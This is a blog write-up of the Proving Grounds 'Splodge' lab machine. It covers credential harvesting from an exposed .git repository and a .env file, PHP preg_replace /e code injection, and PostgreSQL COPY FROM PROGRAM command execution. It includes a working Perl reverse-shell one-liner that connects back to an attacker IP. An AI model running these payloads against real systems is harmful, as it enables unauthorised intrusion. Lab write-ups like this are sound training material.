SecJournal
  • 👋Welcome
    • SecJournal
    • About Me
  • 👨‍💻Blogs
    • My Blogs
      • Malware
        • Fake WinRAR 0-Day
        • Github 0 Days
      • Scams
        • Social Engineering
        • May Chong
        • Liu Hongtian
        • Packing Green
        • Richard Spindler
        • Ukraine
        • Coalition Tech
        • Telegram Customer Service
      • Exploits
      • Random
        • Upgrade Shells
    • Course Reviews
      • OSCP / PEN-200 Review
      • Certified Red Team Operator (CRTO) Review
      • Certified Red Team Expert (CRTE) Review
      • OSWE / WEB-300 Review
      • OSED / EXP-301 Review
  • 🔐What is Security
    • Information Security
    • Getting Started
      • CTFs
      • Hacking
  • 🖱️Website Security
    • Disclosed Bugs
      • Dutch Government
      • Algolia API Misconfiguration
    • Web
      • MVC Framework
    • SQL Injection
      • Portswigger Labs
    • Access Control
      • Portswigger Labs
    • Authentication Bypass
      • Portswigger Labs
    • Business Logic
      • Portswigger Labs
    • Information Disclosure
      • Portswigger Labs
    • Directory Traversal
      • Portswigger Labs
    • Command Injection
      • Portswigger Labs
    • File Upload Vulnerabilities
      • Portswigger Labs
    • Server-Side Request Forgery
      • Portswigger Labs
    • Cross-Origin Resource Sharing
      • Portswigger Labs
    • Cross-Site Request Forgery
      • Portswigger Labs
    • Cross-Site Scripting
      • Portswigger XSS Labs
      • Portswigger DOM-XSS Labs
    • JSON Web Tokens
      • Portswigger Labs
    • API Testing
      • Portswigger Labs
    • WebSockets
      • Portswigger Labs
    • Deserialization
      • Portswigger Labs
    • Prototype Pollution
      • Portswigger Labs
    • Server-Side Template Injection
      • Portswigger Labs
    • XXE Injection
      • Portswigger Labs
    • Web Cache Poisoning
      • Portswigger Labs
    • HTTP Request Smuggling
      • Portswigger Labs
    • OAuth Authentication
      • Portswigger Labs
  • 👀Buffer Overflows
    • Buffer Overflows
      • System Architecture
      • Compilers, Assemblers, Debuggers and Decompilers
      • Binary Security
      • Address Manipulation
    • OSCP BOF (OUTDATED)
    • Ret2Libc
    • ROP Chaining
    • Canary Bypass
    • ASLR Bypass
  • 🖥️Active Directory
    • Active Directory
    • Tools
    • Windows Authentication
    • Kerberos
      • Delegation
      • Attacking Kerberos
    • ACLs and GPOs
      • Abusing ACLs and GPOs
    • LDAP
  • ✍️Writeups
    • HTB Season 3
      • Analytics
      • Appsanity
      • Codify
      • Devvortex
      • Drive
      • Hospital
      • Manager
      • Napper
      • Surveillance
      • Visual
    • HTB Season 2
      • Authority
      • Bookworm
      • Cozyhosting
      • Cybermonday
      • Download
      • Gofer
      • Intentions
      • Keeper
      • Pilgrimage
      • Rebound
      • RegistryTwo
      • Sandworm
      • Sau
      • Zipping
    • HTB Season 1
      • Agile
      • Busqueda
      • Cerberus
      • Coder
      • Format
      • Inject
      • Mailroom
      • MonitorsTwo
      • OnlyForYou
      • PC
      • Socket
      • Snoopy
    • HackTheBox
      • Easy
        • Academy
        • Access
        • Active
        • Admirer
        • Antique
        • Arctic
        • Armageddon
        • Backdoor
        • Bank
        • Bashed
        • Bastion
        • Blue
        • Blocky
        • Blunder
        • Bounty
        • Broker
        • Buff
        • Curling
        • Doctor
        • Driver
        • Explore
        • Forest
        • FriendZone
        • Frolic
        • GoodGames
        • Granny
        • Heist
        • Help
        • Horizontall
        • Irked
        • Jerry
        • Knife
        • Laboratory
        • Legacy
        • Luanne
        • Love
        • Mirai
        • MetaTwo
        • Nest
        • Netmon
        • Networked
        • Nibbles
        • NodeBlog
        • Omni
        • OpenAdmin
        • OpenSource
        • Optimum
        • Paper
        • Pandora
        • Photobomb
        • Postman
        • Precious
        • Previse
        • RedPanda
        • Remote
        • Return
        • RouterSpace
        • Sauna
        • ScriptKiddie
        • Secret
        • Sense
        • Servmon
        • Shoppy
        • Support
        • Soccer
        • Spectra
        • Squashed
        • SteamCloud
        • Stocker
        • SwagShop
        • Tabby
        • Timelapse
        • Toolbox
        • Topology
        • Traceback
        • Trick
        • TwoMillion
        • Valentine
        • Validation
        • Wifinetic
        • Writeup
      • Medium
        • Ambassador
        • Arkham
        • Atom
        • Backend
        • BackendTwo
        • Bagel
        • Bart
        • Bastard
        • Book
        • BroScience
        • Bucket
        • Cache
        • Canape
        • Cascade
        • Catch
        • Chaos
        • Chatterbox
        • Clicker
        • Cronos
        • Devoops
        • dynstr
        • Encoding
        • Epsilon
        • Escape
        • Faculty
        • Forge
        • Forgot
        • Fuse
        • Giddy
        • Haircut
        • Hawk
        • Intelligence
        • Interface
        • Investigation
        • Jeeves
        • Json
        • Jupiter
        • Lazy
        • Lightweight
        • Magic
        • Mentor
        • Meta
        • Monteverde
        • Nineveh
        • Noter
        • Obscurity
        • October
        • Ophiuchi
        • Outdated
        • Passage
        • Pit
        • Poison
        • Popcorn
        • Querier
        • Ransom
        • Resolute
        • Retired
        • Schooled
        • Scrambled
        • Shared
        • Shibboleth
        • Silo
        • SolidState
        • StreamIO
        • TartarSauce
        • Tenet
        • TheNotebook
        • Time
        • Unattended
        • Undetected
        • Unicode
        • Union
        • UpDown
        • Vault
      • Hard
        • Acute
        • Blackfield
        • BreadCrumbs
        • CarpeDiem
        • Extension
        • Falafel
        • Flight
        • Holiday
        • Kotarak
        • Mantis
        • Monitors
        • Object
        • Oouch
        • Pikaboo
        • Pollution
        • Quick
        • RainyDay
        • Reel
        • Registry
        • Search
        • Seventeen
        • Talkative
        • Unobtainium
        • Vessel
        • Zipper
      • Insane
        • Absolute
        • Anubis
        • APT
        • BrainFuck
        • CrossFit
        • Derailed
        • Fighter
        • Fulcrum
        • Hathor
        • Multimaster
        • pivotapi
        • Sekhmet
        • Sink
        • Sizzle
        • Stacked
    • Proving Grounds Practice
      • Windows
        • Access
        • Algernon
        • AuthBy
        • BillyBoss
        • Butch
        • Craft
        • Craft2
        • DVR4
        • Heist
        • Helpdesk
        • Hutch
        • Internal
        • Jacko
        • Kevin
        • Medjed
        • Nickel
        • Resourced
        • Shenzi
        • Slort
        • Squid
        • Symbolic
        • Vault
        • Vector
      • Linux
        • Apex
        • BadCorp
        • Banzai
        • Blackgate
        • Bratarina
        • Breakout
        • BunyIP
        • Cassios
        • Catto
        • Charlotte
        • Chatty
        • ClamAV
        • Cobweb
        • CookieCutter
        • Deployer
        • Depreciated
        • Develop
        • Dibble
        • Escape
        • Exfiltrated
        • Exghost
        • Fail
        • Fantastic
        • Flasky
        • Forward
        • Hawat
        • Hetemit
        • Hunit
        • Illusion
        • Injecto
        • KeyVault
        • G00g
        • Malbec
        • Mantis
        • Maria
        • Matrimony
        • Megavolt
        • Muddy
        • Nappa
        • Nukem
        • Payday
        • Pebbles
        • Pelican
        • Peppo
        • Phobos
        • Postfish
        • PlanetExpress
        • QuackerJack
        • Readys
        • Reconstruction
        • Roquefort
        • Sirol
        • Shiftdel
        • Shifty
        • Snookums
        • Sona
        • Sorcerer
        • Spaghetti
        • Splodge
        • Surf
        • Sybaris
        • Synapse
        • Tico
        • Thor
        • Twiggy
        • UC404
        • VoIP
        • Walla
        • Wheels
        • XposedAPI
        • ZenPhoto
        • Zino
  • 🐍Evasion
    • Evasion
      • Windows Fundamentals
      • Detection
      • Malware Techniques
  • 🔺Adversary Emulation
    • Red Teaming
      • Adversary Emulation
Powered by GitBook
On this page
  • Gaining Access
  • Git Repo -> Creds
  • Web Enum + Source Code -> RCE
  • Privilege Escalation
  • PostgresSQL Creds -> User Shell
  • Root
  1. Writeups
  2. Proving Grounds Practice
  3. Linux

Splodge

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 -Pn 192.168.157.108
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 10:08 +08
Nmap scan report for 192.168.157.108
Host is up (0.17s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
5432/tcp open  postgresql
8080/tcp open  http-proxy

Did a detailed scan for the web ports too:

$ sudo nmap -p 80,1337,8080 -sC -sV --min-rate 3000 192.168.157.108     
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 10:09 +08
Nmap scan report for 192.168.157.108
Host is up (0.17s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
| http-git: 
|   192.168.157.108:80/.git/
|     Git repository found!
|     .gitignore matched patterns 'bug' 'key'
|     .git/config matched patterns 'user'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: initial commit 
|_    Project type: node.js application (guessed from .gitignore)
|_http-title: 403 Forbidden
1337/tcp open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Commando
8080/tcp open  http    nginx 1.16.1
|_http-title: Splodge | Home
|_http-server-header: nginx/1.16.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit

There's a .git repository.

Git Repo -> Creds

I downloaded the .git repository and looked through the logs with git log -p -2. However, it was way too long for me to analyse. Instead, I checked out the repository and checked for passwords:

$ grep -R password                                                 
database/migrations/2020_10_10_015036_create_settings_table.php:            $table->string('password');
database/seeds/DatabaseSeeder.php:            'password' => 'SplodgeSplodgeSplodge'

Web Enum + Source Code -> RCE

Port 80 just showed us a 403 page, which was not helpful. Port 1337 did show some potential for RCE:

However, I was unable to make anything happen. Port 8080 showed a blog page with an admin login:

We can login to the admin panel using admin:SplodgeSplodgeSplodge:

So now we know that the Git repository is for this application. This panel was rather interesting, because it has a 'Profanity Filter Regex' option, which I presume allows us to specify Regex strings within it.

I was unable to find any source code for this Admin Panel specifically, but I can find some code to see what it does within app/Http/Controllers:

PostController.php
public function comment(Request $request, Post $post)
    {
        error_reporting(E_ALL & ~E_NOTICE & ~E_DEPRECATED);
        $author = $request->input('commentAuthor');
        $message = $request->input('commentMessage');
        $settings = DB::table('settings')->first();
        $message = preg_replace($settings->filter, $settings->replacement, $message);
        DB::table('comments')->insert(['post_id' => $post->id, 'author' => $author, 'message' => $message]);
        $comments = DB::table('comments')->where('post_id', '=', $post->id)->get();
        return view('post', ['post' => $post, 'comments' => $comments]);
    }

It seems that there's a preg_replace function that replaces the regex matches with our replacement.

Googling for PHP Regex exploits brings this up:

From the article above, we can use regex of /a/e to inject PHP code. I tested this out:

Afterwards, I sent one comment with the letter 'a' in it. When I did, I got a hit on my HTTP server:

We now have RCE over the machine, and we can easily get a reverse shell on port 8080:

Privilege Escalation

PostgresSQL Creds -> User Shell

We spawned in the /usr/share/nginx/html folder, which had a .env file:

bash-4.2$ ls -al
total 180
drwxr-xr-x. 12   501 games   4096 Oct 17  2020 .
drwxr-xr-x.  5 root  root      49 Oct 17  2020 ..
-rw-r--r--.  1   501 games    362 Oct 17  2020 .env
drwxr-xr-x.  8 root  root     166 Oct 17  2020 .git
-rw-r--r--.  1   501 games    111 Jul  4  2017 .gitattributes
-rw-r--r--.  1   501 games    146 Jul  4  2017 .gitignore
drwxr-xr-x.  7 root  root      98 Oct 17  2020 app
-rwxr-xr-x.  1 root  root    1646 Jul  4  2017 artisan
drwxr-xr-x.  3 root  root      54 Oct 17  2020 bootstrap
-rw-r--r--.  1 root  root    1300 Jul  4  2017 composer.json
-rw-r--r--.  1 root  root  144904 Oct 11  2020 composer.lock
drwxr-xr-x.  2 root  root     209 Oct 17  2020 config
drwxr-xr-x.  5 root  root      90 Oct 17  2020 database
-rw-r--r--.  1 root  root    1043 Jul  4  2017 phpunit.xml
drwxr-xr-x.  3 root  root      71 Oct 17  2020 public
drwxr-xr-x.  5 root  root      45 Oct 17  2020 resources
drwxr-xr-x.  2 root  root      75 Oct 17  2020 routes
-rw-r--r--.  1 root  root     563 Jul  4  2017 server.php
drwxr-xr-x.  5 nginx nginx     46 Oct 17  2020 storage
drwxr-xr-x. 32 root  root    4096 Oct 11  2020 vendor

bash-4.2$ cat .env
APP_NAME=Splodge
APP_ENV=local
APP_KEY=base64:F9jFCNy0vJ1GhEsbf+PjmTSSHk8u741C5XNTN1Rguow=
APP_DEBUG=false
APP_LOG_LEVEL=info
APP_URL=http://splodge.offsec

DB_CONNECTION=pgsql
DB_HOST=127.0.0.1
DB_PORT=5432
DB_DATABASE=splodge
DB_USERNAME=postgres
DB_PASSWORD=PolicyWielderCandle120

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
QUEUE_DRIVER=sync

There's a database password there. We can then login with psql after fixing the PATH variable of this shell:

bash-4.2$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH

bash-4.2$ psql -U postgres -d splodge -h localhost
Password for user postgres: 
psql (12.4)
Type "help" for help.

splodge=# 

There's a feature within PostgreSQL that allows us to execute commands:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

We can just get another reverse shell using this:

COPY cmd_exec FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.196:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

The payload is taken from Hacktricks.

Root

User can run bash as root:

PreviousSpaghettiNextSurf

Last updated 1 year ago

✍️
Command Execution - preg_replace() PHP Function Exploit | RCEMedium
Logo